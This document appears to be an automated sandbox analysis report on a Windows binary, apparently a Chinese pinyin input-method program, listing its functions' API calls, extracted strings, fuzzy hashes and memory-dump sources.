String ID: /../$/..\$4TS$\../$\..\
API String ID: 0-3831562738
Opcode ID: 063c37f97bee0c4451c82402518107afff6692f7ea7115684b11374613f09d8d
Instruction ID: d8e0929ef53b50c17782bfb7de816cdc8e6bb73b8f1739818cee5c51d3bb9aac
Opcode Fuzzy Hash: 063c37f97bee0c4451c82402518107afff6692f7ea7115684b11374613f09d8d
Instruction Fuzzy Hash: 3BF129B19043509FD724CF24C8947EB77E1AF95305F04492EE9998B382E378EA09CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00410120, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00410185
PathCombineW.SHLWAPI(?,09D48295,00530660,0052FD50,?,00000000), ref: 0041019B
_memset.LIBCMT ref: 004101BE
FindFirstFileW.KERNEL32(?,?), ref: 004101D6
DeleteFileW.KERNEL32(?,?,?,?), ref: 0041034D
FindNextFileW.KERNEL32(?,?), ref: 004103BA
RemoveDirectoryW.KERNEL32(?), ref: 0041046B
FindClose.KERNEL32(?), ref: 00410476

Part of subcall function 00406960: OutputDebugStringA.KERNEL32(?,00000002), ref: 004069EB
Part of subcall function 00406960: InitializeCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A10
Part of subcall function 00406960: EnterCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A21
Part of subcall function 00406960: _fprintf.LIBCMT ref: 00406A56
Part of subcall function 00406960: LeaveCriticalSection.KERNEL32(0055F654,?,?,?,?,00000000,?), ref: 00406A63
Part of subcall function 00406960: IsDebuggerPresent.KERNEL32(?), ref: 00406A81
Part of subcall function 00406960: DebugBreak.KERNEL32(?,?,?,?,?,00000000,?), ref: 00406A8B
Part of subcall function 00406960: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00406B8A

Strings

, xrefs: 004103D4

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFileFindSection$Debug_memset$BreakCloseCombineDebuggerDeleteDirectoryEnterFirstInitializeIos_base_dtorLeaveNextOutputPathPresentRemoveString_fprintfstd::ios_base::_
String ID:
API String ID: 4273346265-3916222277
Opcode ID: f245494bb09a459d9b83272d6c3edd38e3604adbe1b7a2ed1ddd2e79ab8b5a54
Instruction ID: c12446bc226bc37bc8438f998b68a51f342704d3d017e1a88e450e5ae5764bdf
Opcode Fuzzy Hash: f245494bb09a459d9b83272d6c3edd38e3604adbe1b7a2ed1ddd2e79ab8b5a54
Instruction Fuzzy Hash: B091F4B05087818FD330CF25D884BDBB7E4BF94315F144A1EE599872C1DBB89988CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3F0, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 410COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041C462
_memmove.LIBCMT ref: 0041C6EB

Strings

invalid bitset<N> position, xrefs: 0041C72C
vector<T> too long, xrefs: 0041C74A

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: invalid bitset<N> position$vector<T> too long
API String ID: 4104443479-707209719
Opcode ID: d7c6ecfd7c38db9b44173bf9347e88f1b99ede48f4a8ef006e909d630f08e87f
Instruction ID: 4be4238dd7416fa231f1726abf6a20e6cccd06dfdb36aee852b252467b73c5b4
Opcode Fuzzy Hash: d7c6ecfd7c38db9b44173bf9347e88f1b99ede48f4a8ef006e909d630f08e87f
Instruction Fuzzy Hash: 63E1B3716443028FC718EF29C8C09ABB7E6FB84305F244A2EE496D7780D774E985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00454060, Relevance: 12.1, APIs: 8, Instructions: 119networkfilesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00454086
HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,0055B1A0,80000000,00000000), ref: 004540C9
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004540E2
HttpQueryInfoW.WININET(00000000,20000013,?,?,00000000), ref: 00454117
InternetReadFile.WININET(00000000,00000000,00004000,?), ref: 0045415E
_memmove.LIBCMT ref: 0045417F
InternetCloseHandle.WININET(00000000), ref: 00454196

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Http$InternetRequest$CloseFileHandleInfoObjectOpenQueryReadSendSingleWait_memmove
String ID:
API String ID: 3184477364-0
Opcode ID: 372498111416804c42ba6cb1615839b0036c3bbc028bd23ee8ee6f21e0eb2c93
Instruction ID: 372a706307ef65fc00840b372681ed82e1e0b8ac61aa43fe1dbf9479d8a06740
Opcode Fuzzy Hash: 372498111416804c42ba6cb1615839b0036c3bbc028bd23ee8ee6f21e0eb2c93
Instruction Fuzzy Hash: 4641E371204300ABE320DF65EC09B6B7BE8AFE5755F04041DFA45DB281E778E54D8BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1E0, Relevance: 11.0, APIs: 7, Instructions: 488COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041F23C
_memset.LIBCMT ref: 0041F25C
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 0041F26C
PathCombineW.SHLWAPI(?,?,?,?,?,?,?,00000000,?), ref: 0041F28B
PathCombineW.SHLWAPI(?,?,00000000,?,?,?,?,00000000,?), ref: 0041F2A0
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,?), ref: 0041F414
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,?), ref: 0041F423

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCombineFilePath_memset$CreateDirectory
String ID:
API String ID: 2268274050-0
Opcode ID: f052304030d07fbb2b6681ddec58b59c6894973a77abd7aed4cb874a649a28be
Instruction ID: ca6c831d13b0beacf6cd5371a605e90b6124039848c9d0120295c50830f1606f
Opcode Fuzzy Hash: f052304030d07fbb2b6681ddec58b59c6894973a77abd7aed4cb874a649a28be
Instruction Fuzzy Hash: CE128FB15083818FD720DF25C885B8FB7E5BFD8304F04492EE5899B251E774A949CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0043E540, Relevance: 10.9, APIs: 7, Instructions: 431COMMON

Download Yara Rule

APIs

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

_memset.LIBCMT ref: 0043E672
PathCombineW.SHLWAPI(?,?,?), ref: 0043E69E
DeleteUrlCacheEntryW.WININET(000000E4), ref: 0043E708
GetLastError.KERNEL32 ref: 0043E712

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CacheCombineDeleteEntryErrorLastPath_malloc_memset
String ID:
API String ID: 1811335663-0
Opcode ID: a7260c8eea3163acfdb075f67b8a1cb3a733770b7efa0adddba2c309ed953744
Instruction ID: 1dd4de86536fa59e4ba02dbccd372c9fcc173062086b1285dd5419cee27ce236
Opcode Fuzzy Hash: a7260c8eea3163acfdb075f67b8a1cb3a733770b7efa0adddba2c309ed953744
Instruction Fuzzy Hash: D602CDB15083848FC724DF16C845BDBB7E4FF88308F045A1EE98997291E778A949CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004731E0, Relevance: 10.7, Strings: 8, Instructions: 740COMMON

Download Yara Rule

Strings

$0 }, xrefs: 004737FA, 00473A73
$0 message $1, xrefs: 0047351A
$0}, xrefs: 00473B87
{, xrefs: 0047326C
$0 extend .$1 {, xrefs: 0047393D
extend .$0 {, xrefs: 00473DC0
$0 extensions $1 to $2;, xrefs: 004736F8
H, xrefs: 00473337

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_malloc
String ID: {$$0 extend .$1 {$$0 extensions $1 to $2;$$0 message $1$$0 }$$0}$H$extend .$0 {
API String ID: 2100221131-3946144182
Opcode ID: 5b4e50b3708e5747707c8c0afa5d588711b5a52bc565d30c7d77253ca0d7cd45
Instruction ID: 3760276d07d860a45e8bb3e24e1a3219a5f1f401b2285a54418b7767ac6e2e38
Opcode Fuzzy Hash: 5b4e50b3708e5747707c8c0afa5d588711b5a52bc565d30c7d77253ca0d7cd45
Instruction Fuzzy Hash: 5472DFB19093819FC374CF1AC880ADBFBE4BBC9304F408A2EE59D87251DB749645CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004C8360, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 004C8270: _malloc.LIBCMT ref: 004C8271

LookupAccountNameW.ADVAPI32 ref: 004C8429
GetLastError.KERNEL32 ref: 004C8433
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 004C8482

Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078

CopySid.ADVAPI32(09D48295,?,?), ref: 004C84A1

Strings

D, xrefs: 004C8442
D, xrefs: 004C8419

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AccountLookupName$CopyErrorException@8LastThrow_malloc_memcpy_s
String ID: D$D
API String ID: 3580705534-143366177
Opcode ID: 01954dede5401a9699005ab2a9a4e05b45dc81a0befbf807de599fc24e23be10
Instruction ID: fd7f0826cf6577601c6c2005b23ef3abe92e8f578b78705bfe30b6a543c8127f
Opcode Fuzzy Hash: 01954dede5401a9699005ab2a9a4e05b45dc81a0befbf807de599fc24e23be10
Instruction Fuzzy Hash: 6051C0755083419FC760DF51C840B9FB7E8EF88344F00492EF68993251DB78EA49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00456840, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97encryptionCOMMON

Download Yara Rule

APIs

CryptDecodeObject.CRYPT32(00010001,00000008,00000000,00000000,00000000,00000000,00000000), ref: 0045686B
CryptDecodeObject.CRYPT32(00010001,00000008,qOE,00000000,00000000,00000000,?), ref: 0045689C
CryptDecodeObject.CRYPT32 ref: 004568C8
CryptDecodeObject.CRYPT32(00010001,00000013,?,?,00000000,00000000,?), ref: 004568F6
CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?,?,?,00455602), ref: 00456912

Strings

qOE, xrefs: 00456882, 00456894

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$DecodeObject$Import
String ID: qOE
API String ID: 2004819364-3676650912
Opcode ID: d1a2c7915e2466e210a584a1d69081c52db5bf340869f76768c84dc11870bb53
Instruction ID: 727fc4c49d4fe4a4bd7551409e3572da5a5ba0ff00da405d99ba658e3555bce7
Opcode Fuzzy Hash: d1a2c7915e2466e210a584a1d69081c52db5bf340869f76768c84dc11870bb53
Instruction Fuzzy Hash: 8221B6B26403057BE220CB51DC82F6BB3ACEB84B04F054519FE44AB281D6B0FC4887A6

Uniqueness

Uniqueness Score: -1.00%

Function 004EE116, Relevance: 10.6, APIs: 7, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,00000000,?,0044A207,?,00000454), ref: 004EE09A
HeapAlloc.KERNEL32(00000000,?,00000454), ref: 004EE0A1

Part of subcall function 004EDFF8: IsProcessorFeaturePresent.KERNEL32(0000000C,004EE088,00000000,?,0044A207,?,00000454), ref: 004EDFFA

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0044A207,?,00000454), ref: 004EE0B4
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000454), ref: 004EE0C5
InterlockedPopEntrySList.KERNEL32(?,00000454), ref: 004EE0DD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000454), ref: 004EE0ED
InterlockedPushEntrySList.KERNEL32(00000000,?,00000454), ref: 004EE104

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
String ID:
API String ID: 2304957937-0
Opcode ID: 7803665e70c868f5318ee65c863790b8200f76d2ea413a89da0c411cd3fb8391
Instruction ID: 8c102e4cb00ea287f55320889518933fe6c3e3938ba085c33d70fd53f0a3f2ea
Opcode Fuzzy Hash: 7803665e70c868f5318ee65c863790b8200f76d2ea413a89da0c411cd3fb8391
Instruction Fuzzy Hash: 5C114931600A61E7D7321767EC09B2B7394AF617D3F210122F900D7290EBB9DC06AB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0043D110, Relevance: 10.6, APIs: 7, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,00000001,00000010,?,?,00000000), ref: 0043D11C
LoadResource.KERNEL32(00000000,00000000), ref: 0043D12A
LockResource.KERNEL32(00000000,?), ref: 0043D136
SizeofResource.KERNEL32(00000000,00000000), ref: 0043D140
_memmove.LIBCMT ref: 0043D15D
VerQueryValueW.VERSION(00000000,0053065C,?,?), ref: 0043D175
FreeLibrary.KERNEL32(00000000), ref: 0043D18E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLibraryLoadLockQuerySizeofValue_memmove
String ID:
API String ID: 1965330434-0
Opcode ID: 720c01d29aa36f89ed117db79694d64507b2926183f78d8a78f3b8e661de19ec
Instruction ID: fa70ab4448b6959269a01cf960b42c66f9a771de086f8ebef818bf7e303f36bf
Opcode Fuzzy Hash: 720c01d29aa36f89ed117db79694d64507b2926183f78d8a78f3b8e661de19ec
Instruction Fuzzy Hash: 0601F5779003107BC320EF339C49CAB7AEDFFAA391F04092AF905D2240E634C40A86B9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D290, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6

Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416

SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
__set_purecall_handler.LIBCMT ref: 0040D2E6
__set_purecall_handler.LIBCMT ref: 0040D2F4

Strings

invalid vector<T> subscript, xrefs: 0040D2C1

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: __set_purecall_handlerstd::exception::exception$CriticalEnterExceptionException@8FilterSectionThrowUnhandledXinvalid_argumentstd::_
String ID: invalid vector<T> subscript
API String ID: 213303058-3016609489
Opcode ID: c7306fcff0ebeac050fca5f3c2364e417c08219a168c82df3c4f5c5e81b67096
Instruction ID: b9aeeb9c314b0ac0f2076101b42be8bcb5330b5c291194b5f4f07b5f3c6e0658
Opcode Fuzzy Hash: c7306fcff0ebeac050fca5f3c2364e417c08219a168c82df3c4f5c5e81b67096
Instruction Fuzzy Hash: 0AF0AF743002008FC714EF69EC95C2A77E1FBA9306B14447DF441CB365CA31A806DB50

Uniqueness

Uniqueness Score: -1.00%

Function 004220D0, Relevance: 9.6, APIs: 3, Strings: 2, Instructions: 889synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

std::_Xinvalid_argument.LIBCPMT ref: 0042214D
std::_Xinvalid_argument.LIBCPMT ref: 00422A4E
WaitForSingleObject.KERNEL32(?,00001388,09D48295,?,0052FD98,?), ref: 00422B07

Strings

vector<T> too long, xrefs: 00422A49
list<T> too long, xrefs: 00422148

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_$ObjectSingleWait_malloc
String ID: list<T> too long$vector<T> too long
API String ID: 2774856280-355118384
Opcode ID: be15cc8fbe822dba3e95fc41e04cc392f5c09e278fbf9008cae8dec0af5aa24e
Instruction ID: d3a87177fef4efcad89e6792d4086f573ff179a82bd05a672c78155ea6bb352e
Opcode Fuzzy Hash: be15cc8fbe822dba3e95fc41e04cc392f5c09e278fbf9008cae8dec0af5aa24e
Instruction Fuzzy Hash: 4B72C3317042519FC728CF28DA90A6BB7E1BF84304F548A6EE856CB395DBB4EC41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004714E0, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 518COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0047167C

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

Strings

H, xrefs: 004719E1

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID: H
API String ID: 1183979061-2852464175
Opcode ID: 36d249fa9bf92a5d8949e37b69a119d72642a0085ba777d453e0784c718abe5b
Instruction ID: b7df50c63abfdc98a96eb5df0bb7949f664c3123ced543f434fb7ac81c5badcc
Opcode Fuzzy Hash: 36d249fa9bf92a5d8949e37b69a119d72642a0085ba777d453e0784c718abe5b
Instruction Fuzzy Hash: C5229DB0A007019FC718DF2AC591A9ABBF1FF48314F15862EE54A8B761D339E951CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00443060, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004430BA

Part of subcall function 004C4B90: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C4BE9

RegCloseKey.ADVAPI32(?), ref: 004430FE
_memset.LIBCMT ref: 004431EB
GetLocaleInfoW.KERNEL32(00000800,00000059,?,00000104,?,?,?), ref: 00443207

Strings

brand, xrefs: 00443211

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close_memset$HandleInfoLocale
String ID: brand
API String ID: 3341748452-475199832
Opcode ID: 354ce90f8a35b64d16a4d3f1e4d793c3f46c320795dee17a37145382ad143eda
Instruction ID: c82e9051da28b157295a79d2523adc7eec5145d03ab64b42a983147d2a2e7ce0
Opcode Fuzzy Hash: 354ce90f8a35b64d16a4d3f1e4d793c3f46c320795dee17a37145382ad143eda
Instruction Fuzzy Hash: 5651C2715083409FE320DF65C899B9FB7E4FF84B15F004A1EF49887291EB789948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00414280, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ieframe.dll,77488B40,?,004177F7,?,?,?,?,?,?,?,?,?,?), ref: 00414287
GetProcAddress.KERNEL32(00000000), ref: 004142A6
FreeLibrary.KERNEL32(00000000), ref: 004142C4

Strings

ieframe.dll, xrefs: 00414282
IEIsProtectedModeProcess, xrefs: 00414298

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: IEIsProtectedModeProcess$ieframe.dll
API String ID: 145871493-256698251
Opcode ID: fbe7994207ca6276ff45ceb54f2f6eabb164ce441e718edfa89d2f2792d8c556
Instruction ID: eff526451499320dfd429a9aeabb64630fd7aa9037ad16a346b345f3993749fa
Opcode Fuzzy Hash: fbe7994207ca6276ff45ceb54f2f6eabb164ce441e718edfa89d2f2792d8c556
Instruction Fuzzy Hash: CAE0E535505721AEC7209BB09C09BCF3BD4AFA57A1F00895DF405C6180DB74C885AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00416030, Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

model, xrefs: 00416526
sysbitmap, xrefs: 004165C8
stock_shuangpin_dict, xrefs: 0041630C
sysdict, xrefs: 00416434
index, xrefs: 004161C2
english, xrefs: 00416074

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CombinePath_memset
